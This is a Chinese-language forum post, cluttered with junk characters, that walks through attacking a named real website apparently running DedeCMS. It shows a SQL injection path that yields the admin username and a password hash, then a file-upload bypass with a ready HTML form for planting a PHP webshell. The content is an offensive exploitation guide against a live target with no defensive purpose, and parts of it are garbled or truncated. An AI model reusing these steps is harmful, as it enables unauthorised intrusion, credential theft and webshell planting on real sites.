①注入漏洞。 s ^1 j2 f5 m
这站 http://www.political-security.com/
- h% V9 A5 K7 p# Q" ^( z8 G首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
: p! S3 v! Z1 R/ c. l$ _/ [www.political-security.com/data/mysql_error_trace.inc 爆后台: t) m3 m$ V1 }* j9 ?" d5 |' ^
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
, e% `: w+ Q1 G( ~3 x9 j2 E然后写上语句 , g! e. h, C8 x d/ ?3 }! `: _0 G6 D
查看管理员帐号" b9 ?! `, _/ v9 v @! p. V
http://www.political-security.co ... &membergroup=@`
7 p$ M- Y& ?8 i+ [: P2 C5 U9 t3 N7 {; \
admin 4 w; o4 W* c) s* C8 d
8 ?# ~% R! _) ~9 Z查看管理员密码- J: I( i" D2 u9 Q
http://www.political-security.co ... &membergroup=@`0 g; J+ a" G. X* M5 h
0 ^' s/ @6 a8 V) R% R4 X. {) p
8d29b1ef9f8c5a5af429
* J* R# ?) Q7 ~$ [, }* D$ j, ?* T' G( R% H
查看管理员密码. _7 q7 f, B9 I8 r( o
: f) _! K# P$ P8 ]5 w* ]
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
' X2 z8 h* I2 t4 j) T7 v, E
. g- d. n4 l+ F8 Y- Z8d2+ X" {$ `0 R* i0 h$ F# ^) o; a B2 l
9b1ef9f8c5a5af42# i0 ~( L* e- a& x1 J- t
9
) D5 Y+ D$ o3 _0 {4 W0 P+ I$ o+ r# J, m" k; k
cmd5没解出来 只好测试第二个方法6 q2 A; L2 _# B8 d0 k
9 w% r7 d7 W' Q" g6 r+ G& C
; B' G3 e0 J& b, P( d7 ?+ | [, M②上传漏洞:
- G; v& X- q4 c. s1 F% Q/ V
4 V0 ?! O/ F* h只要登陆会员中心,然后访问页面链接% A/ d+ {1 }" g# N9 z
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”$ y/ s' e8 h0 o( M3 E6 `
! X5 H3 _$ s! n& `$ n5 G
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
- c7 A! |* p g4 d' P, A3 }6 h
3 M2 ?6 X. ?; a: M% E6 h于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm' U+ e5 D+ E1 t. d$ U# Z
& F' u6 h% c5 b L<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>" `+ W) S; W# Z9 n/ @
或者
% k( ^, c$ a, L: e! }即可上传成功 |